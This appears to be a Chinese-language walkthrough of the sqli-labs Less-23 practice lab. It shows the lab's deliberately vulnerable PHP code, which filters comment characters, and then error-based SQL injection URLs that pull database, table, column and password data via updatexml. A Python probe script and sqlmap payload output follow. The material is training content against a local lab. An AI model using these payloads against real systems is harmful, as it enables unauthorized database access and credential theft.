sqli-lab-less23
一、靶标地址
Less-23 GET-Error based-strip comments
#基于报错 过滤注释符 GET 注入
http://127.0.0.1/sqli/less-23/
二、漏洞探测
#http://127.0.0.1/sqli/Less-23/index.php?id=1'
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
#推断语句为'1'' LIMIT 0,1
#猜测语句为select * from xxx where id='$id' limit 0,1;
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//filter the comments out so as to comments should not work
$reg = "/#/";
// `/` 是正则表达式的起始和结束分隔符。
// `#` 是要匹配的字符 "#".
$reg1 = "/--/";
$replace = "";#把注释符替换为空""
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#0000ff">';
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
preg_replace(mixed $pattern,mixed $replacement,mixed $subject);
执行一个正则表达式的搜索和替换。
$pattern:要搜索的模式,可以是字符串或一个字符串数组
$replacement:用于替换的字符串或字符串组
$subject:要搜索替换的目标字符串或字符串数组
一般会把注释符替换为空""
四、黑盒与白盒测试
利用注释符别过滤不能成功闭合单引号等,换一种思路
利用or '1'='1闭合单引号等。
#猜测语句为select * from xxx where id='$id' limit 0,1;
http://127.0.0.1/sqli/Less-23/index.php?id=1' and '1' = '1
#成功回显
以updatexml报错函数为例为例
#获取数据库名
http://127.0.0.1/sqli/Less-23/index.php?id=1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '1' = '1
#获取表名
http://127.0.0.1/sqli/Less-23/index.php?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) and '1' = '1
#获取列名
http://127.0.0.1/sqli/Less-23/index.php?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) and '1' = '1
#获取列字段
http://127.0.0.1/sqli/Less-23/index.php?id=1' and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) and '1' = '1
五、脚本撰写
import requests
url="http://127.0.0.1/sqli/less-23/index.php?id=1"
#F12查看或者burpsuite抓包
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload="'--+"
response=requests.get(url+payload,headers=header)
print(response.text)
#根据回显来确定
六、sqlmap
sqmap -u "http://127.0.0.1/sqli/less-23/index.php?id=1" --batch
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3318=3318 AND 'YUgJ'='YUgJ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 7840 FROM(SELECT COUNT(*),CONCAT(0x716b6a6a71,(SELECT (ELT(7840=7840,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nvxw'='nvxw
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3458 FROM (SELECT(SLEEP(5)))Amso) AND 'WBdb'='WBdb
七、总结
1、sql注入防御方法:输入参数去除注释符号
2、sql注入绕过方法:根据猜测语句使用符合原语句的闭合方式